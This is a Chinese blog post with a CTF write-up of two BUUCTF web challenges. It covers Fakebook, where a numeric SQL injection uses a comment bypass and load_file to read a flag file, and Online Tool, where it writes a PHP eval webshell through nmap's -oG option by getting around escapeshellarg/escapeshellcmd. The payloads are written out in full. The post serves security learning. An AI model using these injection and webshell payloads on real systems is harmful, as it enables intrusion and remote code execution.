BUUCTF Web [网鼎杯 2018]Fakebook1 & [BUUCTF 2018]Online Tool1

本文通过分析两个CTF比赛的挑战,展示了Web应用中的SQL注入和命令执行漏洞。在Fakebook1中,利用数字型SQL注入读取了flag;在OnlineTool1中,利用nmap命令执行漏洞写入了shell。这两个案例强调了代码审计和安全防护的重要性。
摘要由CSDN通过智能技术生成

[网鼎杯 2018]Fakebook1

启动靶机,发现fakebook

看到两个功能点  login和join

打开login,随便输入几个弱口令

均显示错误,还是先注册一个吧,点击join

 注册成功,点击zhangsan

发现?no=1  。感觉存在sql注入,测试一下:

?no=1'

 

 报错了,回显中只有三个引号,所以应该是数字型注入

order by 测列数

?no=1 order by 4

 当值为5时发现报错,所以是存在4列

union select 查回显点

?no=-1 union select 1,2,3,4

 看来有检测,尝试/**/绕过

?no=-1 union/**/select 1,2,3,4

 发现username处有回显,且回显值为第二个字段。开始注入。

flag 一般放在/flag或者/var/www/html/flag.php, 先尝试一下读文件

?no=-1 union/**/select 1,load_file("/flag"),3,4

 username回显为空,查看源代码也没什么发现,那再看看/var/www/html/flag.php是否存在

?no=-1 union/**/select 1,load_file("/var/www/html/flag.php"),3,4

 也是空,右键查看源代码

拿到flag             flag{c6b824bb-f42e-4ee3-95af-35a4d88d209f} 

这种方法运气占主导,看了看大佬的wp,使用的是sql注入+反序列化,感兴趣可以看一下。

[BUUCTF 2018]Online Tool1

启动靶机

代码审计,整体的意思就是输入host(ip地址),然后进行nmap扫描,前面几个参数没见过,查了查:

$_SERVER 可以获取服务器和执行环境信息
HTTP_X_FORWARDED_FOR HTTP扩展头部,用来表示http请求端真实ip
REMOTE_ADDR代表客户端的IP。

还不知道这几个参数有什么用,继续审计,下面就是GET传一个叫host的参数,而且host会与nmap拼接,感觉这里会存在命令执行漏洞,百度一下,发现nmap可以直接写马

构造payload:   引号绕过 escapeshellarg()和escapeshellcmd()  

?host='<?php eval($_POST[1]);?> -oG shell.php ’

 回显了路径,访问一下

发现没有报错信息,复制url,蚁剑连接

 拿到flag           flag{9e867599-c834-463b-b839-7a601cca8660}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值